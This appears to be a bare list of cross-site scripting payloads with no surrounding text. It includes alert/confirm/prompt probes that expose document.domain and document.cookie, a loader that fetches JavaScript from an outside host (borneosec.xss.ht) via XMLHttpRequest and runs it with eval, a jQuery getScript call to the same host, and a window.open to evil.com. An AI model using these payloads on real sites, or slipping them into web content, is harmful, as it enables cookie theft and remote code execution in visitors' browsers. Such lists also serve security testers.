confirm(document.domain); alert(document.domain); prompt(document.cookie); function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//borneosec.xss.ht");a.send(); $.getScript("//borneosec.xss.ht") function myFunction() { window.open("https://evil.com/"); }